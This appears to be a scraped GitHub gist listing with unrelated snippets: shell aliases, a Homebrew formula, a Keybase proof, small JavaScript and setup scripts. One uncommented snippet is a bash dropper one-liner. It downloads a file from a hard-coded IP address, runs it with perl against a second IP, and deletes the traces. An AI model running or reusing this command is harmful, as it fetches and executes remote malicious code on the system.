- (response.code !== undefined
- && response.code !== 0
- && response.code !== 'aeolus/ok'
- && response.code !== 'notification/ok')
+ (response.code !== undefined &&
+ response.code !== 0 &&
+ response.code !== 'aeolus/ok' &&
+ response.code !== 'notification/ok')
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Fish Shell Aliases | |
alias ydl "youtube-dl -f 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/bestvideo+bestaudio' --merge-output-format mp4" | |
alias bn 'npm --registry https://bnpm.byted.org' | |
alias k1 'kubectl --kubeconfig ~/.kube/config/k1.yaml' | |
alias k2 'kubectl --kubeconfig ~/.kube/config/k2.yaml' | |
alias k3 'kubectl --kubeconfig ~/.kube/config/k3.yaml' |
Built within Alpine 3.11.5
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bash -c cd /var/tmp/ ; cd /tmp/ ; rm -rf ssh1.txt ; wget http://195.22.126.16/ssh1.txt ; mv ssh1.txt wget.txt ; perl wget.txt 193.169.252.253 ; lwp-download http://195.22.126.16/ssh1.txt ; mv ssh1.txt lynx.txt ; perl lynx.txt 193.169.252.253 ; fetch http://195.22.126.16/ssh1.txt ; mv ssh1.txt fetch.txt ; perl fetch.txt 193.169.252.253 ; curl -O http://195.22.126.16/ssh1.txt ; mv ssh1.txt curl.txt ; perl curl.txt 193.169.252.253 ; rm -rf ssh1.txt wget.txt lynx.txt fetch.txt curl.txt |
I hereby claim:
- I am amio on github.
- I am amio (https://keybase.io/amio) on keybase.
- I have a public key whose fingerprint is 16EA 4801 9A32 BEF2 0AFB D38B 6377 AE88 EF71 5499
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require "language/node" | |
class NowCli < Formula | |
desc "The command-line interface for realtime global deployments." | |
homepage "https://zeit.co/now" | |
url "https://github.com/zeit/now-cli/archive/7.0.2.tar.gz" | |
sha256 "7924feb98f07a599cb9ffdabd07f95048864cf4fe15fdcbd2922b8cd8b32a8be" | |
def install | |
system "npm", "install", *Language::Node.std_npm_install_args(libexec) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.querySelectorAll('img').forEach(e => e.removeAttribute('alt')) |
Also a Vultr Startup Script for Ubuntu 16.04.
curl https://gist.githubusercontent.com/amio/b71617198e801577b72518c4ad5c4908/raw/ub16-init.sh | bash
made with esnextbin
NewerOlder